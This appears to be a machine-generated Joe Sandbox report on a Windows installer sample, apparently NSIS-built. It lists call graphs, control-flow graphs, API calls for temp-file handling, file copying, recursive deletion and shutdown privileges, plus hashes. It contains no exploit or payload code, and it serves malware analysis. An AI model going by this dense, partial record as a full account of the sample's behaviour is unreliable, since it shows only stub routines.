5163->5140 5163->5143 5163->5144 5163->5148 5163->5151 5163->5154 5163->5155 5163->5159 5163->5160 5165 7013122c 2 API calls 5163->5165 5165->5163 5166->5150 5167 7013206d 5167->5095 5170 701323ac 5168->5170 5169 7013122c GlobalAlloc lstrcpynW 5169->5170 5170->5169 5172 701324d5 GlobalFree 5170->5172 5174 70132454 GlobalAlloc WideCharToMultiByte 5170->5174 5175 7013247f GlobalAlloc CLSIDFromString 5170->5175 5176 7013249e 5170->5176 5240 701312ba 5170->5240 5172->5170 5173 701317cf 5172->5173 5173->5103 5173->5108 5173->5110 5174->5172 5175->5172 5176->5172 5244 701326b8 5176->5244 5180 70132abe 5178->5180 5179 70132b63 EnumWindows 5183 70132b81 5179->5183 5180->5179 5182 70132c4d 5182->5103 5247 70132a56 5183->5247 5185 70132367 5184->5185 5186 70132372 GlobalAlloc 5185->5186 5187 701317c8 5185->5187 5186->5185 5187->5098 5192 70132754 5188->5192 5189 70132802 5191 70132808 GlobalSize 5189->5191 5193 70132812 5189->5193 5190 701327ef GlobalAlloc 5190->5193 5191->5193 5192->5189 5192->5190 5193->5122 5195 70132d42 5194->5195 5196 70132d82 GlobalFree 5195->5196 5251 7013121b GlobalAlloc 5197->5251 5199 7013261f lstrcpynW 5202 70132573 5199->5202 5200 7013260e StringFromGUID2 5200->5202 5201 701325ec MultiByteToWideChar 5201->5202 5202->5199 5202->5200 5202->5201 5203 70132632 wsprintfW 5202->5203 5204 70132656 GlobalFree 5202->5204 5205 7013268b GlobalFree 5202->5205 5206 70131272 2 API calls 5202->5206 5252 701312e1 5202->5252 5203->5202 5204->5202 5205->5116 5206->5202 5256 7013121b GlobalAlloc 5208->5256 5210 701315b9 5211 701315c6 2 API calls 5210->5211 5212 701315c3 5211->5212 5213 70131272 5212->5213 5214 701312b5 GlobalFree 5213->5214 5215 7013127b GlobalAlloc lstrcpynW 5213->5215 5214->5120 5215->5214 5217 701315ff lstrcpyW 5216->5217 5219 701315d2 wsprintfW 5216->5219 5221 70131618 5217->5221 5219->5221 5221->5123 5223 7013253a 5222->5223 5225 70131891 5222->5225 5224 70132556 GlobalFree 5223->5224 5223->5225 5224->5223 5225->5131 5225->5132 5227 70131272 2 API calls 5226->5227 5228 7013155e 5227->5228 5228->5126 5229->5136 5230->5163 5232 701315ad 5231->5232 5232->5159 5239 7013121b GlobalAlloc 5233->5239 5235 7013123b lstrcpynW 5235->5155 5236->5167 5237->5156 5238->5162 5239->5235 5241 701312c1 5240->5241 5242 7013122c 2 API calls 5241->5242 5243 701312df 5242->5243 5243->5170 5245 701326c6 VirtualAlloc 5244->5245 5246 7013271c 5244->5246 5245->5246 5246->5176 5248 70132a61 5247->5248 5249 70132a71 5248->5249 5250 70132a66 GetLastError 5248->5250 5249->5182 5250->5249 5251->5202 5253 701312ea 5252->5253 5254 7013130c 5252->5254 5253->5254 5255 701312f0 lstrcpyW 5253->5255 5254->5202 5255->5254 5256->5210 5976 701310e1 5978 70131111 5976->5978 5977 701311d8 GlobalFree 5978->5977 5979 701312ba 2 API calls 5978->5979 5980 701311d3 5978->5980 5981 701311f8 GlobalFree 5978->5981 5982 70131272 2 API calls 5978->5982 5983 70131164 GlobalAlloc 5978->5983 5984 701312e1 lstrcpyW 5978->5984 5985 701311c4 GlobalFree 5978->5985 5979->5978 5980->5977 5981->5978 5982->5985 5983->5978 5984->5978 5985->5978 5991 402a35 5992 402c1f 17 API calls 5991->5992 5993 402a3b 5992->5993 5994 402a72 5993->5994 5996 40288b 5993->5996 5997 402a4d 5993->5997 5995 40640a 17 API calls 5994->5995 5994->5996 5995->5996 5997->5996 5999 40632f wsprintfW 5997->5999 5999->5996 6000 401735 6001 402c41 17 API calls 6000->6001 6002 40173c SearchPathW 6001->6002 6003 4029e6 6002->6003 6004 401757 6002->6004 6004->6003 6006 4063e8 lstrcpynW 6004->6006 6006->6003 6007 4014b8 6008 4014be 6007->6008 6009 401389 2 API calls 6008->6009 6010 4014c6 6009->6010 6011 401db9 GetDC 6012 402c1f 17 API calls 6011->6012 6013 401dcb GetDeviceCaps MulDiv ReleaseDC 6012->6013 6014 402c1f 17 API calls 6013->6014 6015 401dfc 6014->6015 6016 40640a 17 API calls 6015->6016 6017 401e39 CreateFontIndirectW 6016->6017 6018 402592 6017->6018 6019 40283b 6020 402843 6019->6020 6021 402847 FindNextFileW 6020->6021 6022 402859 6020->6022 6021->6022 6023 4029e6 6022->6023 6025 4063e8 lstrcpynW 6022->6025 6025->6023 6026 7013166d 6027 70131516 GlobalFree 6026->6027 6030 70131685 6027->6030 6028 701316cb GlobalFree 6029 701316a0 6029->6028 6030->6028 6030->6029 6031 701316b7 VirtualFree 6030->6031 6031->6028

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->53 56 403814-403824 call 4039e6 OleUninitialize 39->56 57 403769-40376f 39->57 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 52 40369d-4036a1 49->52 50->49 58 40364d-403655 50->58 52->36 59 4036c2-4036d0 call 4063e8 52->59 53->39 53->56 54->55 55->28 61 4036c0 55->61 75 40394a-403950 56->75 76 40382a-40383a call 405a4e ExitProcess 56->76 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 65 403657-40365a 58->65 66 40365c 58->66 68 4036d5 59->68 61->68 74 403810 62->74 79 403782-4037b7 63->79 80 4037ce-4037d8 63->80 65->49 65->66 66->49 68->29 74->56 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 85 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->85 86 40399e-4039ac call 4067c2 77->86 88 4039d8 78->88 89 4039dc-4039e0 ExitProcess 78->89 87 4037b9-4037bd 79->87 82 403840-403854 call 4059b9 lstrcatW 80->82 83 4037da-4037e8 call 405dc5 80->83 100 403861-40387b lstrcatW lstrcmpiW 82->100 101 403856-40385c lstrcatW 82->101 83->56 99 4037ea-403800 call 4063e8 * 2 83->99 85->86 102 4039ba-4039c5 ExitWindowsEx 86->102 103 4039ae-4039b8 86->103 93 4037c6-4037ca 87->93 94 4037bf-4037c4 87->94 88->89 93->87 98 4037cc 93->98 94->93 94->98 98->80 99->62 100->56 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->56 138->126
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\ajRZflJ2ch.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\ajRZflJ2ch.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-412367475
                                                                                                            • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 153 40514f-405156 148->153 156 405080-405087 149->156 157 405073-40507a 149->157 154 404ed9 150->154 155 404edc-404ef9 call 40640a SendMessageW * 2 150->155 151->147 152 404f01-404f2d call 40435f * 2 151->152 195 404f33-404f39 152->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 152->196 161 4051c7-4051cf 153->161 162 405158-40515e 153->162 154->155 155->151 158 405089-40508c 156->158 159 4050fc-4050ff 156->159 157->153 157->156 167 405097-4050ac call 404d1a 158->167 168 40508e-405095 158->168 159->153 172 405101-40510b 159->172 164 4051d1-4051d7 SendMessageW 161->164 165 4051d9-4051e0 161->165 170 405164-40516e 162->170 171 4053af-4053c1 call 4043c6 162->171 164->165 175 4051e2-4051e9 165->175 176 405214-40521b 165->176 167->159 194 4050ae-4050bf 167->194 168->159 168->167 170->171 179 405174-405183 SendMessageW 170->179 173 40511b-405125 172->173 174 40510d-405119 SendMessageW 172->174 173->153 182 405127-405131 173->182 174->173 183 4051f2-4051f9 175->183 184 4051eb-4051ec ImageList_Destroy 175->184 187 405371-405378 176->187 188 405221-40522d call 4011ef 176->188 179->171 189 405189-40519a SendMessageW 179->189 190 405142-40514c 182->190 191 405133-405140 182->191 192 405202-40520e 183->192 193 4051fb-4051fc GlobalFree 183->193 184->183 187->171 200 40537a-405381 187->200 213 40523d-405240 188->213 214 40522f-405232 188->214 198 4051a4-4051a6 189->198 199 40519c-4051a2 189->199 190->153 191->153 192->176 193->192 194->159 202 4050c1-4050c3 194->202 203 404f3c-404f43 195->203 201 405011-405015 196->201 205 4051a7-4051c0 call 401299 SendMessageW 198->205 199->198 199->205 200->171 206 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->206 207 405017-40502a ShowWindow call 404394 201->207 208 40502f-405037 call 404394 201->208 209 4050c5-4050cc 202->209 210 4050d6 202->210 211 404fd9-404fec 203->211 212 404f49-404f71 203->212 205->161 206->171 207->171 208->140 220 4050d2-4050d4 209->220 221 4050ce-4050d0 209->221 224 4050d9-4050f5 call 40117d 210->224 211->203 228 404ff2-404ff6 211->228 222 404f73-404fa9 SendMessageW 212->222 223 404fab-404fad 212->223 216 405281-4052a5 call 4011ef 213->216 217 405242-40525b call 4012e2 call 401299 213->217 225 405234 214->225 226 405235-405238 call 404d9a 214->226 241 405347-40535b InvalidateRect 216->241 242 4052ab 216->242 246 40526b-40527a SendMessageW 217->246 247 40525d-405263 217->247 220->224 221->224 222->211 233 404fc0-404fd6 SendMessageW 223->233 234 404faf-404fbe SendMessageW 223->234 224->159 225->226 226->213 228->196 228->201 233->211 234->211 241->187 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->187 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->216 251 405265 247->251 252 405266-405269 247->252 254 4052cc-4052d9 248->254 255 4052dd-4052e0 248->255 249->241 249->245 251->252 252->246 252->247 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->249 260->259
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 579 405cb6-405cba 577->579 580 405b42-405b44 578->580 581 405b53-405b63 call 4063e8 578->581 582 405c64-405c69 580->582 583 405b4a-405b4d 580->583 587 405b72-405b73 call 405d09 581->587 588 405b65-405b70 lstrcatW 581->588 582->579 586 405c6b-405c6e 582->586 583->581 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->579 590->579 597 405c82-405c96 call 405cbd call 405ab2 590->597 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 598 405b93-405baf lstrlenW FindFirstFileW 594->598 595->594 595->598 614 405c98-405c9b 597->614 615 405cae-405cb1 call 405450 597->615 600 405bb5-405bbd 598->600 601 405c59-405c5d 598->601 602 405bdd-405bf1 call 4063e8 600->602 603 405bbf-405bc7 600->603 601->582 605 405c5f 601->605 616 405bf3-405bfb 602->616 617 405c08-405c13 call 405ab2 602->617 606 405bc9-405bd1 603->606 607 405c3c-405c4c FindNextFileW 603->607 605->582 606->602 610 405bd3-405bdb 606->610 607->600 613 405c52-405c53 FindClose 607->613 610->602 610->607 613->601 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->579 616->607 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->579 619->607 627->607 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 405c2c-405c32 628->632 631->607 632->607
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-1432729950
                                                                                                            • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
